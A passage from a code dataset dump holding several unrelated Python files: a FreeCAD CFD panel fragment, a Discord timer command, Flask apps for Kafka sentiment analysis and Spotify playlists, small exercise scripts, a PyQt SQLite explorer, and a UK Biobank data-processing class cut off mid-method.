self.form.inputSRFCoRy.property(\"quantity\").Value,\n self.form.inputSRFCoRz.property(\"quantity\").Value)\n storeIfChanged(self.obj, 'SRFModelCoR', centre_of_rotation)\n model_axis = FreeCAD.Vector(\n self.form.inputSRFAxisx.property(\"quantity\").Value,\n self.form.inputSRFAxisy.property(\"quantity\").Value,\n self.form.inputSRFAxisz.property(\"quantity\").Value)\n storeIfChanged(self.obj, 'SRFModelAxis', model_axis)\n\n def reject(self):\n doc = FreeCADGui.getDocument(self.obj.Document)\n doc.resetEdit()\n\n def closing(self):\n # We call this from unsetEdit to allow cleanup\n 
return","repo_name":"jaheyns/CfdOF","sub_path":"CfdOF/Solve/TaskPanelCfdPhysicsSelection.py","file_name":"TaskPanelCfdPhysicsSelection.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"6"} +{"seq_id":"28544966105","text":"from data.config import __EMBED_COLOUR__\nfrom time import time\n\n\nasync def ct(cmd, message, args, timers, Embed):\n embed = Embed(\n title=\"Timers\", description=\"\", colour=__EMBED_COLOUR__)\n if timers != []:\n for timer in timers:\n # structure of timer: [still, time, userid, type]\n still = timer[0]\n time_left = int(timer[1] - time())\n user = timer[2]\n type = timer[3]\n embed.add_field(\n name=f\"Still: {still} - {type} - Started by {user}\", value=f\"Time Left: {time_left}\", inline=False)\n\n else:\n embed.add_field(\n name=\"No timers\", value=\"There are no timers currently active\", inline=False)\n\n await message.channel.send(embed=embed)\n return\n","repo_name":"TheJamieP/moonshiner-bot","sub_path":"commands/checktimers.py","file_name":"checktimers.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30414890014","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 4 11:48:14 2023\r\n\r\n@author: krishna\r\n\"\"\"\r\nfrom flask import Flask, request, redirect\r\nimport subprocess, sys, os\r\nfrom flask import Flask, render_template_string\r\n\r\ncwd = os.getcwd()\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n '''\r\n routing func to display the home page\r\n\r\n Returns\r\n -------\r\n html : string\r\n html home page.\r\n\r\n '''\r\n # Create the HTML for the page\r\n html = \"\"\"
<html>\r\n<body>\r\n<h1>Hello, i am Groot!</h1>\\\r\n<h3>This is a demo project on kafka and python !</h3>\r\n<br>\r\n<p>Thanks and Regards,\\\r\nGroot Yadav</p>\r\n</body>\r\n</html>\r\n \t \"\"\"\r\n \r\n return html\r\n\r\n\t\r\n@app.route('/kafkaProducer', methods=['POST'])\r\ndef kafkaProducer():\r\n '''\r\n func to call kafka producer over subprocess\r\n\r\n Returns\r\n -------\r\n html : string\r\n renders output from subprocess python call.\r\n\r\n '''\r\n # Run the external Python script and capture its output\r\n try:\r\n output = subprocess.check_output(['python', 'kafka_senti_producer.py','producer']).decode(\"utf-8\")\r\n except subprocess.CalledProcessError as error:\r\n print(\"Error in kafka producer endpoint func\")\r\n print (error.output.decode(\"utf-8\"))\r\n output = error.output.decode(\"utf-8\")\r\n\r\n # Create the HTML for the page\r\n html = \"\"\r\n html += \"\"\r\n \r\n html += ''\r\n html += \"\"\r\n \r\n return html\r\n\t\r\n\t\r\n\r\n@app.route('/kafkaConsumer', methods=['POST'])\r\ndef kafkaConsumer():\r\n '''\r\n Func to call kafka consumer python sub process\r\n performs sentiment analysis on batch\r\n and saves output charts\r\n\r\n Returns\r\n -------\r\n html : string\r\n renders output of kafka consumer process.\r\n\r\n '''\r\n # Run the external Python script and capture its output\r\n try:\r\n output = subprocess.check_output(['python', 'kafka_senti_consumer.py', 'consumer']).decode(\"utf-8\")\r\n except subprocess.CalledProcessError as error:\r\n output = error.output.decode(\"utf-8\")\r\n\r\n # Create the HTML for the page\r\n html = \"\"\r\n html += \"\"\r\n html += ''\r\n html += \"\"\r\n \r\n return html\r\n\r\n@app.route('/sentimentOutput', methods=['POST'])\r\ndef sentimentOutput():\r\n '''\r\n func to render results\r\n for sentiment analysis\r\n\r\n Returns\r\n -------\r\n TYPE\r\n DESCRIPTION.\r\n\r\n '''\r\n # create html for the page\r\n html = \"<h1>Kafka Sentiment Analysis output</h1><br><h2>Sentiment Pie chart</h2><br>\"\r\n filename = \"pieplot.png\"\r\n html += f'<img src=\"{filename}\">'\r\n\r\n exp_dict = {'neg':'Negative words', 'pos':'Positive words', 'neu':'Neutral words'}\r\n for filename in [ \"wordcloud_neg.png\", \"wordcloud_pos.png\", \"wordcloud_neu.png\"]:\r\n #html += f'<img src=\"{filename}\">'\r\n html += \"<br><br><h2>Word Cloud - {}</h2><br>\".format(exp_dict[filename.split(\".\")[0].split(\"_\")[-1]])\r\n html += f'<img src=\"{filename}\">
'\r\n\r\n \r\n html += ''\r\n html += \"\"\r\n \r\n return render_template_string(html)\r\n\r\n\r\n\r\n@app.route(\"/go_home\", methods=['POST'])\r\ndef go_home():\r\n return redirect(\"/\")\r\n\r\nif __name__ == '__main__':\r\n app.run(host='localhost', port=5000)\r\n","repo_name":"thestarguy/KafkaBasicsAndSentimentAnalysis","sub_path":"Flask_demoApp.py","file_name":"Flask_demoApp.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"26053679030","text":"from itertools import permutations\n\n\ncount = 0\nfor i in list(permutations(\"ТИКТОК\")):\n for j in range(1, len(i) - 1):\n if i[j] == i[j - 1] or i[j] == i[j + 1]:\n break\n else:\n # no adjacent equal letters: count this permutation and keep scanning\n count += 1\n\nprint(count)\n","repo_name":"Woolfer0097/UGE_IT","sub_path":"8 task/211.py","file_name":"211.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"6591200964","text":"import os\nimport evy.spotify\n\nfrom flask import session, redirect, url_for, render_template, request, send_file, current_app, Response\nfrom . import main\n\n@main.route('/')\ndef index():\n \"\"\"Renders the landing page\n\n Returns:\n str: HTML output\n \"\"\"\n\n return render_template('index.html')\n\n@main.route('/do', methods = [\"GET\", \"POST\"])\ndef do():\n if request.method == \"POST\":\n if not \"bpm\" in request.form:\n return \"Malformed POST request.\"\n \n # Save BPM\n session[\"bpm\"] = request.form[\"bpm\"]\n elif request.method == \"GET\":\n if not \"bpm\" in session:\n return \"Malformed session.\"\n \n cache_handler, auth_manager = evy.spotify.get_auth(session)\n\n if request.args.get(\"code\"):\n # Step 2. Being redirected from Spotify auth page\n auth_manager.get_access_token(request.args.get(\"code\"))\n return redirect('/do')\n\n if not auth_manager.validate_token(cache_handler.get_cached_token()):\n # Step 1. Display sign in link when no token\n auth_url = auth_manager.get_authorize_url()\n return redirect(auth_url)\n\n # Step 3. 
Signed in, display data\n sp = evy.spotify.create_spotipy(auth_manager)\n \n # Create playlist\n playlist_url, track_count = evy.spotify.create_playlist(sp, session[\"bpm\"])\n\n max_songs = evy.spotify.MAX_TRACKS\n\n return render_template('do.html', playlist_url=playlist_url,\n track_count=track_count, bpm=session[\"bpm\"], max_songs=max_songs)\n\n@main.route('/privacy')\ndef privacy():\n return render_template('privacy.html')","repo_name":"AntheSevenants/evy","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"7212362196","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport Formats\r\n\r\nclass Stats:\r\n def empirical_cumulative_distribution(self, series: pd.Series):\r\n n = len(series)\r\n x = np.sort(series)\r\n y = np.arange(1, n+1) / n\r\n return x, y\r\n\r\n def correlational_coefficient(self, series1: pd.Series, series2: pd.Series):\r\n correlational_coefficient = np.corrcoef(series1, series2)[0,1]\r\n print(correlational_coefficient)\r\n\r\n def check_for_normal_distribution(self, series_to_check: pd.Series):\r\n #obtain mean and std\r\n mean = np.mean(series_to_check)\r\n std_deviation = np.std(series_to_check)\r\n\r\n # Sample out of a normal distribution\r\n samples = np.random.normal(mean, std_deviation, 10000)\r\n\r\n # Get the CDF of the samples and of the data, using the ECDF helper defined above\r\n x_theor, y_theor = self.empirical_cumulative_distribution(samples)\r\n x_actual, y_actual = self.empirical_cumulative_distribution(series_to_check)\r\n\r\n # Plot the CDFs and show the plot\r\n _ = plt.plot(x_theor, y_theor)\r\n _ = plt.plot(x_actual, y_actual, marker='.', linestyle='none')\r\n _ = plt.xlabel(series_to_check.name)\r\n _ = plt.ylabel('CDF')\r\n _ = plt.title('Check for Normal Distribution')\r\n plt.show()\r\n\r\n def univariate(self, df, columns_to_test: list): \r\n df_results = pd.DataFrame()\r\n for col in columns_to_test:\r\n \r\n #obtain stats\r\n median = np.median(df[col]); median = Formats.currency(median)\r\n mean = np.mean(df[col]); mean = Formats.currency(mean)\r\n variance = np.var(df[col]); variance = Formats.currency(variance)\r\n standard_deviation = np.std(df[col]); standard_deviation= Formats.currency(standard_deviation)\r\n \r\n #create df\r\n df_to_append = pd.DataFrame.from_dict({'column': col, 'median': [median], 'mean':[mean], 'standard deviation': standard_deviation})\r\n df_results = pd.concat([df_results, df_to_append], ignore_index=True)\r\n print(df_results)\r\n\r\n def bivariate(self, series1: pd.Series, series2: pd.Series):\r\n \r\n name = series1.name + ' vs ' + series2.name\r\n print(name)\r\n covariance = np.cov(series1, series2)[0,1]\r\n correlational_coefficient = np.corrcoef(series1, series2)[0,1]\r\n print(correlational_coefficient)\r\n dct = {'covariance': [covariance], 'correlational coefficient': [correlational_coefficient]}\r\n\r\n df_results = pd.DataFrame.from_dict(dct)\r\n\r\n print(df_results)","repo_name":"Sburi/CustomPythonEnv","sub_path":"Stats.py","file_name":"Stats.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"27466257275","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 1 06:40:51 2022\r\n\r\n@author: lbush\r\n\r\n\"\"\"\r\n\r\naaList = []\r\naa = \"Phe, Val, Asn, Gln, His, Leu, Cys, Gly, Ser\"\r\n\r\naaList = aa.split(', 
')\r\n\r\nprint(aaList)\r\nprint(\"\\n\")\r\n\r\nlength = len(aaList)\r\nprint(f\"The length of the polypeptide is {length} amino acids long\\n\")\r\n\r\naaList.append(\"His\")\r\nprint(aaList)\r\n\r\n\r\n# create an inversion\r\n# Create an inversion: get two positions in the sequence \r\n# from the user and invert the sequence of the amino acids between them\")\r\n\r\nuserInput1 = int(input(\"Please enter the start position of the inversion: \"))\r\nuserInput2 = int(input(\"Please enter the end position of the inversion: \"))\r\n\r\ninput1 = userInput1-1\r\ninput2 = userInput2\r\n\r\n# create a variable named lstSec to store the segment\r\nlstSec = aaList[input1:input2]\r\n\r\n# print(lstSec)\r\n\r\n# arrange the partial list in reverse order\r\nlstSec.reverse()\r\n\r\nprint(\"Amino acid sequence prior to inversion: \\n\", aaList)\r\n\r\n# print(lstSec)\r\naaList[input1:input2] = lstSec\r\n\r\nprint(\"Amino acid sequence after inversion: \\n\", aaList)\r\n\r\n\r\n# 2\r\nprint(\"Answers to question number 2\")\r\nseqArray = []\r\nseq = \"Trp Arg Liu Ilu Asp\"\r\nseqArray = seq.split(\" \")\r\n\r\nprint(seqArray)\r\n\r\nleng = len(seqArray)\r\n\r\nuserInput = int(input(f\"Please give a number between 1 and {leng}: \"))\r\n\r\nif (userInput < 1) or (userInput > len(seqArray)):\r\n print(\"Error: number not in range\")\r\nelse:\r\n print(\"The amino acid at that position is: \", seqArray[userInput-1])\r\nprint(\"\\n\")\r\n\r\n\r\n# 3) Write a program to store the following DNA sequence into an array\r\nprint(\"Answers to question number 3\")\r\n#converting string to an array named seqList\r\n\r\nseq = \"CCGTAACGC\"\r\nseqList = []\r\nfor i in seq:\r\n seqList.append(i)\r\n\r\n# a) Add a T to the end of the array, then print the array.\r\n\r\nseqList.append(\"T\")\r\nprint(seqList)\r\n\r\n# b) Remove the 1st element of the array and print it.\r\n\r\nprint(seqList.pop(0))\r\nprint(seqList)\r\n\r\n# c) Add T to the beginning of the array and print the array.\r\n\r\nseqList.insert(0, \"T\")\r\nprint(seqList)\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"lbushen/Bioinformatics_python","sub_path":"Bushen_A2.py","file_name":"Bushen_A2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27466257275","text":"#program for calculator\r\n# Function to add two numbers\r\ndef add(a, b):\r\n return a + b\r\n\r\n# Function to subtract two numbers\r\ndef subtract(a, b):\r\n return a - b\r\n\r\n# Function to multiply two numbers\r\ndef multiply(a, b):\r\n return a * b\r\n\r\n# Function to mod two numbers\r\ndef mod(a, b):\r\n return a % b\r\n\r\n# Function to divide two numbers\r\ndef divide(a, b):\r\n if b == 0:\r\n print(\"Error: division by zero\")\r\n return None\r\n return a / b\r\n\r\n\r\n\r\n# Main loop for the calculator\r\nwhile True:\r\n print(\"\\nSelect an operation:\")\r\n print(\"1. Add\")\r\n print(\"2. Subtract\")\r\n print(\"3. Multiply\")\r\n print(\"4. Mod\")\r\n print(\"5. Divide\")\r\n print(\"6. 
Quit\")\r\n choice = input(\"Enter your choice (1-6): \")\r\n if choice == \"1\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = add(a, b)\r\n print(\"Sum: \", result)\r\n elif choice == \"2\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = subtract(a, b)\r\n print(\"Difference: \", result)\r\n elif choice == \"3\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = multiply(a, b)\r\n print(\"Product: \", result)\r\n\r\n elif choice== \"4\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"enter n2: \"))\r\n result = mod(a,b)\r\n print(\"Remainder:\",result)\r\n\r\n elif choice == \"5\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = divide(a, b)\r\n if result is not None:\r\n print(\"Quotient: \", result)\r\n \r\n elif choice == \"6\":\r\n print(\"End!\")\r\n break\r\n else:\r\n print(\"Invalid choice!\")\r\n","repo_name":"Deepabs-12/deepabs-training-assignments","sub_path":"Python-Mini Projects/calci.py","file_name":"calci.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31913254920","text":"from windows import amsql_explorer_window\nfrom ui_objects.ui_tab_table import ui_tabTable\nfrom ui_objects.ui_tree_view import UiTreeView\nfrom dialogue_window import DialogueWindow_Warning, DialogueWindow_TextEnter, DialogueWindow_Config, DialogueWindow_Message\n\nfrom actions import Action_OpenDatabase, Action_NewDatabase, Action_TableColumns, Action_TableRows\nfrom actions import Action_updateTableRow, Action_DropTable, Action_RemoveRowsFromTable\nfrom actions import Action_InsertNewRow, Action_OpenTableTabFormTreeItem, Action_OpenTableTabForNewTable\nfrom actions import Action_AddTable\n\ndef noAction(a, b):\n pass\n\nif __name__ == \"__main__\":\n\n import amsql_config # setup config\n import global_config\n import sys\n from PyQt5 import QtWidgets\n import ui_objects.ui_helpers\n\n global_config.GlobalConfig.load_from_file()\n\n # start the QApp\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n main_app = amsql_explorer_window.Ui_MainWindow()\n main_app.setupUi(MainWindow)\n\n ui_objects.ui_helpers.UiHelpers.central_widget = main_app.centralwidget\n\n # Setup message dialog window\n dialog_message = DialogueWindow_Message()\n\n # Add the welcome tab\n main_app.welcome_tab()\n\n # Setup the classes to manage the UI elements :)\n ui_tab_table = ui_tabTable( main_app.tab_view, main_app.statusbar )\n ui_tree_view = UiTreeView(main_app.treeWidget, main_app.statusbar )\n\n # Setup actions\n open_database_action = Action_OpenDatabase(dialog_message, ui_tree_view)\n new_database_action = Action_NewDatabase(dialog_message, ui_tree_view)\n new_table_action = Action_OpenTableTabForNewTable(dialog_message, ui_tree_view, ui_tab_table)\n new_table_save_action = Action_AddTable(dialog_message, ui_tree_view, ui_tab_table )\n drop_table_action = Action_DropTable(dialog_message, ui_tree_view)\n open_table_in_tab_action = Action_OpenTableTabFormTreeItem(dialog_message, ui_tree_view, ui_tab_table)\n\n table_columns_action = Action_TableColumns(dialog_message, ui_tree_view, ui_tab_table)\n table_rows_action = Action_TableRows(dialog_message, ui_tree_view, ui_tab_table)\n table_item_changed_action = Action_updateTableRow(dialog_message)\n table_remove_rows_action = Action_RemoveRowsFromTable(dialog_message, 
ui_tab_table)\n table_insert_row_action = Action_InsertNewRow(dialog_message, ui_tab_table)\n\n # set actions on ui\n ui_tree_view.add_actions(open_table_in_tab_action)\n ui_tree_view.add_actions(table_columns_action)\n ui_tree_view.add_actions(table_rows_action)\n\n ui_tab_table.add_action(ui_tabTable.TAB_TYPE_TABLE, table_item_changed_action)\n ui_tab_table.add_action(ui_tabTable.TAB_TYPE_NEW_TABLE, new_table_save_action)\n\n # Setup dialogue instances\n dialogs = {}\n\n dialogs[\"drop_table\"] = DialogueWindow_Warning(drop_table_action.run_action) # TODO: update table name in window\n dialogs[\"remove_rows\"] = DialogueWindow_Warning(table_remove_rows_action.run_action) # TODO: update table name in window\n dialogs[\"new_database\"] = DialogueWindow_TextEnter(new_database_action.run_action, \"New database name\")\n dialogs[\"open_database\"] = DialogueWindow_TextEnter(open_database_action.run_action, \"Existing database name\")\n dialogs[\"new_table\"] = DialogueWindow_TextEnter(new_table_action.run_action, \"New table name\")\n\n dialogs[\"config\"] = DialogueWindow_Config()\n\n # setup display values on dialog windows\n dialogs[\"new_database\"].set_standard_buttons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n dialogs[\"new_table\"].set_standard_buttons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n\n # set dict of dialogues in each dialogue instance to prevent multiple windows from being opened\n dialogs[\"drop_table\"].set_dialog_windows(dialogs)\n dialogs[\"remove_rows\"].set_dialog_windows(dialogs)\n dialogs[\"new_database\"].set_dialog_windows(dialogs)\n dialogs[\"open_database\"].set_dialog_windows(dialogs)\n dialogs[\"new_table\"].set_dialog_windows(dialogs)\n dialogs[\"config\"].set_dialog_windows(dialogs)\n\n # bind buttons\n main_app.button_drop_table.clicked.connect(dialogs[\"drop_table\"].new_window)\n main_app.button_new_database.clicked.connect(dialogs[\"new_database\"].new_window)\n main_app.button_open_database.clicked.connect(dialogs[\"open_database\"].new_window)\n main_app.button_remove_row.clicked.connect(dialogs[\"remove_rows\"].new_window)\n main_app.button_add_table.clicked.connect(dialogs[\"new_table\"].new_window)\n main_app.button_add_row.clicked.connect(table_insert_row_action.button_run_action)\n\n # bind 'File' context menu buttons\n main_app.actionShow_Welcome_Screen.triggered.connect(main_app.welcome_tab)\n main_app.actionSettings.triggered.connect(dialogs[\"config\"].new_window)\n main_app.actionQuit.triggered.connect(sys.exit)\n\n # add default db's on start.\n startup_databases = global_config.GlobalConfig.get(\"default_db\").split(\"\\n\")\n for db in startup_databases:\n if not db.isspace() and len(db) > 0:\n open_database_action.run_action( {\"text\": db}, 1 )\n\n # Finally show the window :D\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"Ashley-Sands/SQLightExplorer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31170465221","text":"import os\n\nimport sys\n\n\nsys.path.append(\"../../../ukb-dementia-shap/\")\n\n\nsys.path.append(\"../Pain/code/\")\nfrom logic.data_processing.data_import import dataload\nfrom logic.data_processing.data_processing import data_proc_main\nfrom logic.analysis.analysis import AnalysisCharts\nfrom logic.ml.classification_shap import IDEARs_funcs\nfrom ukb_utils.utils import basic_funcs\n\nimport matplotlib.pyplot as 
plt\nimport seaborn as sns\nfrom pandas.tseries.offsets import DateOffset\nimport datetime as dt\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport re\n\nac=dataload()\ndp=data_proc_main()\nml=IDEARs_funcs()\nan=AnalysisCharts()\n\n\n\nclass data_setup():\n\n \"\"\"\n This class is to extract key information from XMLDoc text and return as a set of dataframes\n \"\"\"\n\n def __init__(self) -> None:\n\n self.path_data=\"/Users/michaelallwright/Documents/data/ukb/\"\n self.date_suff=dt.datetime.today().strftime('%Y-%m-%d')\n self.pain_dic=dict({'Not pain-related':'Non Pain','Pain-related - New category \"Arthritis-pain\"':'Arth'})\n self.icd10s=dp.ukb_icd10()\n self.ukb_file='../../data/ukb50790.tab'\n\n #self.field_name_file=pd.read_csv('../../data/ukb_field_names.csv')\n self.field_name_file=pd.read_excel(self.path_data+'metadata/ukb_field_names.xlsx',sheet_name='fieldnames_full')\n #self.field_name_data_dic=pd.read_csv('../../data/data_dic.csv')\n self.field_name_data_dic=pd.read_csv(self.path_data+'metadata/data_dic.csv')\n\n self.field_name_full_file=pd.read_excel(self.path_data+'metadata/ukb_field_names.xlsx',\n sheet_name='fieldnames_full')\n\n self.varmap=dict(zip(self.field_name_full_file[\"col.name\"],self.field_name_full_file[\"Field\"]))\n\n self.code_map=pd.read_csv(self.path_data+'metadata/code_map2.csv')\n\n self.compvars=['glycated_haemoglobin_hba1c_f30750_0_0','cystatin_c_f30720_0_0','neutrophill_count_f30140_0_0',\n 'creactive_protein_f30710_0_0','neutrophill_lymphocyte_ratio','lymphocyte_count_f30120_0_0',\n 'monocyte_count_f30130_0_0','basophill_count_f30160_0_0']\n self.compvars_perc=['neutrophill_percentage_f30200_0_0','lymphocyte_percentage_f30180_0_0',\n 'monocyte_percentage_f30190_0_0','basophill_percentage_f30220_0_0']\n\n #self.varmap=None\n\n def count_nulls(self,df):\n\n # returns a dataframe with the number of nulls and non nulls for each field as well as a list of values and counts\n cols=[]\n non_nulls=[]\n vals_all=[]\n for c in df.columns:\n if c!='eid':\n cols.append(c)\n ns=df[c][pd.notnull(df[c])].shape[0]\n non_nulls.append(ns)\n vals=dict(df[c].value_counts())\n vals_all.append(vals)\n\n df2=pd.DataFrame({'Column':cols,'non_nulls':non_nulls,'vals_all':vals_all})\n df2.sort_values(by='non_nulls',ascending=False,inplace=True)\n return df2\n\n def varnorm_mult(self,df,normvars,bd_var):\n bdowns=list(df[bd_var].unique())\n\n #for i,b in enumerate(bdowns):\n dfs=[df.loc[(df[bd_var]==b),] for b in bdowns]\n df_sums=[pd.DataFrame(df.groupby(normvars).size()).reset_index() for df in dfs]\n\n for i,df in enumerate(df_sums):\n df.columns=normvars+['recs_'+str(i)]\n\n df_out=df_sums[0].copy()\n for i in range(len(bdowns)-1):\n df_out=pd.merge(df_out,df_sums[i+1],on=normvars,how='inner')\n\n return df_out\n\n def agenorm(self,df,var):\n df_sum=pd.DataFrame(df.groupby(['age_when_attended_assessment_centre_f21003_0_0']).agg({var:['mean']})).reset_index()\n df_sum.columns=['age_when_attended_assessment_centre_f21003_0_0','mean'+var]\n\n df=pd.merge(df,df_sum,on='age_when_attended_assessment_centre_f21003_0_0',how='left')\n\n df[var]=df[var].mean()*df[var]/df['mean'+var]\n df.drop(columns=['mean'+var],inplace=True)\n return df\n\n def varnorm1(self,df,normvars,depvar,max_mult=None,delete_df=False):\n\n # rebalances dataframe to be equal across case and control as defined by depvar=1/0 across a list of variables which must be present in the data\n #df1=df.copy()\n\n mask=(df[depvar]==1)\n \n df_case=df.loc[mask,]\n df_ctrl=df.loc[~mask,]\n\n if 
delete_df:\n del df\n\n\n\n cases=pd.DataFrame(df_case.groupby(normvars).size()).reset_index()\n ctrls=pd.DataFrame(df_ctrl.groupby(normvars).size()).reset_index()\n\n ctrls.columns=normvars+['ctrl_recs']\n cases.columns=normvars+['case_recs']\n ctrl_case=pd.merge(cases,ctrls,on=normvars,how='inner')\n ctrl_case['ratio']=(ctrl_case['ctrl_recs']/ctrl_case['case_recs'])\n \n if max_mult==None:\n max_mult=ctrl_case['ratio'].min()\n\n \n ctrl_case['case_samp']=max_mult\n\n return ctrl_case,df_ctrl,df_case,cases\n\n def varnorm(self,df,normvars,depvar,max_mult=None,delete_df=False):\n\n # rebalances dataframe to be equal across case and control as defined by depvar=1/0 across a list of variables which must be present in the data\n #df1=df.copy()\n\n mask=(df[depvar]==1)\n \n df_case=df.loc[mask,]\n df_ctrl=df.loc[~mask,]\n\n if delete_df:\n del df\n\n\n cases=pd.DataFrame(df_case.groupby(normvars).size()).reset_index()\n ctrls=pd.DataFrame(df_ctrl.groupby(normvars).size()).reset_index()\n\n ctrls.columns=normvars+['ctrl_recs']\n cases.columns=normvars+['case_recs']\n ctrl_case=pd.merge(cases,ctrls,on=normvars,how='inner')\n ctrl_case['ratio']=(ctrl_case['ctrl_recs']/ctrl_case['case_recs'])\n \n if max_mult==None:\n max_mult=ctrl_case['ratio'].min()\n \n ctrl_case['case_samp']=max_mult\n\n\n\n df_ctrl=pd.merge(df_ctrl,ctrl_case,on=normvars)\n\n grouped = df_ctrl.groupby(normvars, group_keys=False)\n df_ctrl=df_ctrl.loc[grouped.apply(lambda x: x.sample((x['case_samp']*x['case_recs']).astype(int).iloc[0])).index,]\n df_ctrl.drop(columns=['ctrl_recs','ratio','case_samp','case_recs'],inplace=True)\n df_out=pd.concat([df_ctrl,df_case],axis=0)\n #df_out=df_out.reset_index()\n \n return df_out\n \n\n def search_icd(self,strings='chronic pain',second_string='',non_strings='xxxxx',string_pat=True):\n mask=(self.icd10s['disease'].str.contains(strings,regex=True))&(~self.icd10s['disease'].str.contains(non_strings,regex=True))&\\\n (self.icd10s['disease'].str.contains(second_string,regex=True))\n icd10_sub=list(self.icd10s.loc[mask,'code'])\n icd_df=self.icd10s.loc[mask,]\n \n if string_pat:\n icd10_sub='|'.join(icd10_sub)\n \n return icd10_sub,icd_df\n\n def sep_path(self,string,i=1):\n try:\n s=string.split('>')[i]\n except:\n s='N/A'\n return s\n\n def map_codes(self):\n code_map=self.code_map.copy()\n code_names=[]\n code_dicts=[]\n for c in code_map['Coding'].unique():\n df1=code_map.loc[code_map['Coding']==c,]\n dict1=dict(zip(df1['Value'],df1['Meaning']))\n code_names.append(c)\n code_dicts.append(dict1)\n code_mappings=pd.DataFrame({'code':code_names,'dicts':code_dicts})\n\n self.code_mappings=code_mappings\n\n return code_mappings\n\n def make_dicts(self):\n field_names=self.field_name_file.copy()\n data_dic=self.field_name_data_dic.copy()\n\n\n field_names['FieldID']=field_names['field.showcase'].astype(str)\n field_names['FieldID']=field_names['field.tab'].apply(lambda x:x.split('.')[1])\n \n data_dic['FieldID']=data_dic['FieldID'].astype(str)\n field_names2=pd.merge(field_names,data_dic,on='FieldID',how='left')\n\n field_names2['Path']=field_names2['Path'].astype(str)\n field_names2['field_type0']=field_names2.apply(lambda x:self.sep_path(x['Path'],0),axis=1)\n field_names2['field_type1']=field_names2.apply(lambda x:self.sep_path(x['Path'],1),axis=1)\n field_names2['field_type2']=field_names2.apply(lambda x:self.sep_path(x['Path'],2),axis=1)\n field_names2['field_type3']=field_names2.apply(lambda x:self.sep_path(x['Path'],3),axis=1)\n\n 
field_names2.loc[pd.notnull(field_names2['Coding']),'Coding']=\\\n field_names2.loc[pd.notnull(field_names2['Coding']),'Coding'].astype(int)\n\n varmap=dict(zip(field_names['field.tab'],field_names['col.name']))\n\n colsnew=list(field_names.groupby('field.showcase').first()['field.tab'])\n colsnew2=list(field_names.groupby('field.showcase').first()['col.name'])\n\n colsnew_tp1=list(field_names.groupby('field.showcase').nth(1)['field.tab'])\n colsnew2_tp1=list(field_names.groupby('field.showcase').nth(1)['col.name'])\n\n self.varmap=varmap\n self.colsnew=colsnew\n\n dict_maps=dict({'varmap':varmap,'colsnew':colsnew,'colsnew2':colsnew2,'colsnew_tp1':colsnew_tp1,\n 'colsnew2_tp1':colsnew2_tp1,'field_names2':field_names2})\n\n return dict_maps\n\n def make_parquet(self,cols,outfile='df_pain_ukb',parq_out=False):\n\n if self.varmap is None:\n print(\"getting apps time\")\n self.make_dicts()\n\n cols=[c for c in self.colsnew if self.varmap[c] in cols]\n\n df=pd.read_csv(self.ukb_file,sep='\\t',usecols=cols)\n df.columns=[self.varmap[c] for c in df.columns]\n\n if parq_out:\n df.to_parquet('../../data/'+outfile+'.parquet')\n\n return df\n\n def data_clean(self,df,depvar='neuropathy',remwords='xxxxxxx'):\n\n df=ml.col_spec_chars(df=df)\n\n \n df=df.loc[pd.notnull(df[depvar]),]\n\n if depvar=='AD':\n dropvars=list(set([c for c in df.columns if re.search(ml.wordsremoveAD,c)]))\n\n else:\n dropvars=list(set([c for c in df.columns if re.search(ml.wordsremovePD,c)]+\n [c for c in df.columns if re.search(remwords,c)]))\n\n return df,dropvars\n\n\n\n def process_run(self,df,depvar='neuropathy',resize=1,remwords='xxxxxxx',resizeratio=20,runs=2,holdout_ratio=0.5,\n df_val_use=None,preprocess=True,shapshow=2):\n\n df,dropvars=self.data_clean(df,depvar=depvar,remwords=remwords)\n \n shap_tuple=ml.run_entire_data_pd(df=df,drops=dropvars,wordsremove=remwords,outfile='test_pain',savefile=False,\n save_featslist=False,runs=runs,depvar=depvar,agemin=10,agemax=90,resize=resize,holdout_ratio=holdout_ratio,\n resizeratio=resizeratio,verbose=False,df_val_use=df_val_use,preprocess=preprocess,shapshow=2)\n \n return shap_tuple\n\n def 